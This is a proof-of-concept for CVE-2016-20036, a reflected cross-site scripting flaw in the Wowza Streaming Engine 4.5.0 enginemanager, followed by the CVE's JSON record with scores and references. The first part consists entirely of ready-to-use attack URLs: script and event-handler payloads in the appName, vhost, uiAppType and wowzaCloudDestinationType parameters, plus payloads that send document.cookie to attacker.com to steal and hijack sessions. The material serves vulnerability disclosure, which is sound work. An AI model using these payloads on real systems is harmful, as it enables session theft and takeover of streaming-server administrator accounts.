CVE-2016-20036

<!-- CVE-2016-20036 PoC - Reflected XSS in Wowza Streaming Engine --> <!-- Target: Wowza Streaming Engine 4.5.0 enginemanager --> <!-- Vulnerable Parameters: appName, vhost, uiAppType, wowzaCloudDestinationType --> <!-- Basic XSS PoC --> https://target:8080/enginemanager/server/serverhost.jsp?appName=<script>alert(document.cookie)</script> https://target:8080/enginemanager/server/serverhost.jsp?vhost=<img src=x onerror=alert('XSS')> https://target:8080/enginemanager/home/index.jsp?uiAppType=<script>alert(document.domain)</script> https://target:8080/enginemanager/server/vhost.jsp?wowzaCloudDestinationType=<svg/onload=alert(document.cookie)> <!-- Cookie Stealing PoC --> https://target:8080/enginemanager/server/serverhost.jsp?appName=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script> <!-- Session Hijacking PoC --> https://target:8080/enginemanager/home/index.jsp?uiAppType=<script>document.location='https://attacker.com/log?cookie='+document.cookie</script>

{"cve": {"id": "CVE-2016-20036", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:50.883", "lastModified": "2026-03-19T14:17:47.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wowza Streaming Engine 4.5.0 contains multiple reflected cross-site scripting vulnerabilities in the enginemanager interface where input passed through various parameters is not properly sanitized before being returned to users. Attackers can inject malicious script code through parameters like appName, vhost, uiAppType, and wowzaCloudDestinationType in multiple endpoints to execute arbitrary HTML and JavaScript in a user's browser session."}, {"lang": "es", "value": "Wowza Streaming Engine 4.5.0 contiene múltiples vulnerabilidades de cross-site scripting reflejado en la interfaz enginemanager, donde la entrada pasada a través de varios parámetros no se sanea correctamente antes de ser devuelta a los usuarios. Los atacantes pueden inyectar código de script malicioso a través de parámetros como appName, vhost, uiAppType y wowzaCloudDestinationType en múltiples puntos finales para ejecutar HTML y JavaScript arbitrarios en la sesión del navegador de un usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wowza:streaming_engine:4.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "FDC6B630-F0E9-4F80-8EF2-112FAB0A46C2"}]}]}], "references": [{"url": "http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/40135", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/wowza-streaming-engine-multiple-cross-site-scripting-vulnerabilities", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}